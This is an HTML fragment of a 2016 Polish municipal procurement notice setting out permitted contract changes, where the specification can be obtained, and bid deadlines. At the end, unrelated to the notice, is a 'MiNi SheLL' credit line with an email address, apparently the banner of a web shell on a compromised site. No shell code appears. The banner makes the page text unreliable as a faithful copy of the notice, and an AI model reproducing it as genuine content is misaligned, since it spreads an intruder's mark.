<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza przedłużenie terminu wykonania umowy, jeżeli niemożność dotrzymania pierwotnego terminu stanowi konsekwencję:
a)	siły wyższej,
b)	konieczności wykonania zamówień dodatkowych, zgodnie z art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych lub robót zamiennych,
c)	przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów za których działania nie odpowiada Wykonawca,
d)	zmian spowodowanych warunkami geologicznymi, terenowymi (w szczególności przebiegiem urządzeń podziemnych, instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od przyjętych w dokumentacji projektowej tj. np. wyższy poziom wody gruntowej, inny przebieg urządzenia podziemnego, podziemna komora, której nie ma w planach itp.
W powyższych przypadkach termin wykonania umowy może ulec odpowiedniej zmianie - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć takiej zmiany.
2.Roboty zamienne mogą być realizowane wyłącznie po uzyskaniu pisemnej zgody Zamawiającego pod rygorem nieważności, poprzedzonej uzasadnionym pisemnym zgłoszeniem przez wykonawcę zakresu robót zamiennych. Dopuszczalne są roboty zamienne w zakresie zmian materiałów, technologii, urządzeń na materiały, technologie 
i urządzenia spełniające parametry techniczne lub na o wyższych parametrach niż określone w dokumentacji technicznej i ofercie przetargowej Wykonawcy. 
 Uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót.
3. Zmiana terminu realizacji zamówienia jest możliwa w przypadku wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać udokumentowany  wpisem kierownika budowy do Dziennika budowy oraz potwierdzony przez inspektora nadzoru i  zgłoszony niezwłocznie Zamawiającemu; 	
4.	Dopuszczalne są zmiany umowy w zakresie osób i adresów w niej wskazanych.
5.	Dopuszczalne są zmiany umowy w zakresie wynagrodzenia rozliczanego fakturą częściową - w przypadku, gdy potrzeba dokonania takiej zmiany wynika ze zmiany terminu wykonania umowy lub poszczególnych etapów określonych w harmonogramie rzeczowo-finansowym. Zmiany w harmonogramie rzeczowo-finansowym mogą zostać wprowadzone w każdym momencie w czasie realizacji przedmiotu umowy, na pisemny wniosek strony umowy i po akceptacji drugiej strony umowy. Zmiany harmonogramu rzeczowo-finansowego nie wymagają aneksowania umowy, a jedynie pisemnego podpisania nowego harmonogramu przez osoby reprezentujące strony umowy.
6. Zamawiający przewiduje możliwość zmiany umowy również w przypadku zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
a.	stawki podatku od towarów i usług - przy niezmienności ceny netto,
b.	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę, zmianie ulegnie wysokość  wynagrodzenia Wykonawcy określonej w niniejszej umowie jeden raz w roku, w oparciu o wskaźnik wzrostu minimalnego wynagrodzenia ustalany przez Komisję Trójstronną lub Radę Ministrów. 
W przypadku tej zmiany, wynagrodzenie ulegnie zmianie proporcjonalne do wpływu na koszt wykonania Zamówienia przez Wykonawcę.
c.	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
W przypadku tej zmiany, wynagrodzenie ulegnie zmianie proporcjonalne do wpływu na koszt wykonania Zamówienia przez Wykonawcę.
Zmiany, o których mowa w ust. 10 powyżej mogą zostać dokonane, wyłącznie wtedy gdy będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Ciężar udowodnienia tego faktu oraz jego wysokość leży po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Usług Komunalnych Sp. z o.o.
Bytkowo ul. Topolowa 6, 62-090 Rokietnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 09:10, miejsce: Przedsiębiorstwo Usług Komunalnych Sp. z o.o.
Bytkowo ul. Topolowa 6, 62-090 Rokietnica
Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com